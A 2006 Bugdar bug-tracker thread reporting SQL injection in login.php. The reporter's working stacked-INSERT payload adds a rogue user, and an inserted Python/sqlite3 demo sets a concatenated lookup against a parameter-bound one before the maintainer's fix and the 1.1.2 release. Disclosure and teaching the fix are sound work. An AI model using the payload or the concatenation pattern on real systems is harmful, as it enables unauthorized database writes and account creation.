		October 12, 2006 02:30 PM
		Michael von Känel
	
	
	
		I think there could be an issue on login.php.
You can simply enter an SQL string in the email field on login.php.
Try adding this one:
'; INSERT INTO `user` ( `userid` , `email` , `displayname` , `usergroupid` , `password` , `salt` , `authkey` , `showemail` , `showcolors` , `languageid` , `timezone` , `usedst` , `hidestatuses` , `defaultsortkey` , `defaultsortas` ) VALUES ('', 'got', 'you', '0', '', '', '', '0', NULL , '0', '0', '0', '', NULL , NULL); -- '
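As an added illustration of the defect class this report describes, and not code from Bugdar or from the reporter: a constructed Python/sqlite3 script that runs a payload modelled on the stacked INSERT above through two lookups, one that splices the submitted value into the SQL text (with a hypothetical `run_multi` helper standing in for a database layer that accepts several statements per call) and one that binds it as a parameter. The table schema, the sample user and all function names are assumptions; the row count before and after each lookup is what shows the difference.

```python
import sqlite3

# Constructed payload modelled on the one in the report: close the quoted email
# value, stack an INSERT, then comment out the remainder of the original query.
INJECTED_EMAIL = "'; INSERT INTO user (email, displayname) VALUES ('got', 'you'); -- '"


def make_db():
    """Minimal in-memory user table (constructed; not Bugdar's real schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE user (userid INTEGER PRIMARY KEY, email TEXT, displayname TEXT)"
    )
    conn.execute(
        "INSERT INTO user (email, displayname) VALUES ('alice@example.com', 'Alice')"
    )
    conn.commit()
    return conn


def user_count(conn):
    return conn.execute("SELECT COUNT(*) FROM user").fetchone()[0]


def run_multi(conn, sql):
    """Hypothetical stand-in for a DB layer that accepts several ';'-separated
    statements per call. Returns the rows of the first statement; the later
    ones run for their side effects only."""
    rows = None
    for stmt in sql.split(";"):
        stmt = stmt.strip()
        if not stmt or stmt.startswith("--"):
            continue  # empty statement or a comment-only tail
        cur = conn.execute(stmt)
        if rows is None:
            rows = cur.fetchall()
    conn.commit()
    return rows


def lookup_vulnerable(conn, email):
    """The defective pattern: the submitted value is spliced into the SQL text,
    so a quote in it ends the literal and everything after it becomes SQL."""
    sql = "SELECT userid, displayname FROM user WHERE email = '" + email + "'"
    return run_multi(conn, sql)


def lookup_safe(conn, email):
    """Parameter binding: the value travels separately from the SQL text, so
    quotes, ';' and '--' inside it are just characters of an email address."""
    cur = conn.execute(
        "SELECT userid, displayname FROM user WHERE email = ?", (email,)
    )
    return cur.fetchone()


def trial(lookup, email):
    """Run one lookup on a fresh DB; return (result, rows before, rows after)."""
    conn = make_db()
    before = user_count(conn)
    result = lookup(conn, email)
    after = user_count(conn)
    conn.close()
    return result, before, after


if __name__ == "__main__":
    print("vulnerable:", trial(lookup_vulnerable, INJECTED_EMAIL))  # ([], 1, 2)
    print("safe:      ", trial(lookup_safe, INJECTED_EMAIL))        # (None, 1, 1)
    print("safe, real:", trial(lookup_safe, "alice@example.com"))   # ((1, 'Alice'), 1, 1)
```

The concatenated version gains a rogue row even though the login itself fails; the bound version returns no user and leaves the table untouched. Binding is the fix; an email-format check on the input is a useful second layer but not a substitute for it.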
  On October 12, 2006 06:17 PM, Robert changed:
  
- Hidden from "0" to "1"
- Status from "Unconfirmed" to "Confirmed"
		October 12, 2006 06:17 PM
		Robert
	
	
	
		Confirmed and marking security issue (hidden).
	
	
	
		October 12, 2006 08:01 PM
		Robert
	
	
	
		I'm now in the process of auditing all the Bugdar code. A 1.1.2 release will be issued promptly once the code is security checked and retested. Thank you for bringing this to my attention.
	
	
	
		October 13, 2006 12:31 AM
		Robert
	
	
	
		Thank you for your bug report. This issue has been closed and fixed in Subversion. This change will be available in a future release, but you can download the change at any time from the Subversion server.
	
	
	
  On October 13, 2006 12:31 AM, Robert changed:
  
- Status from "Confirmed" to "Closed"
- Resolution from "Open" to "Fixed"
- Fixed in Revision from "" to "1248"
		October 13, 2006 12:50 AM
		Robert
	
	
	
		Bugdar 1.1.2 is now released with this and two other security issues resolved. Unmarking as security and making visible.
	
	
	
  On October 13, 2006 12:50 AM, Robert changed:
  
- Hidden from "1" to ""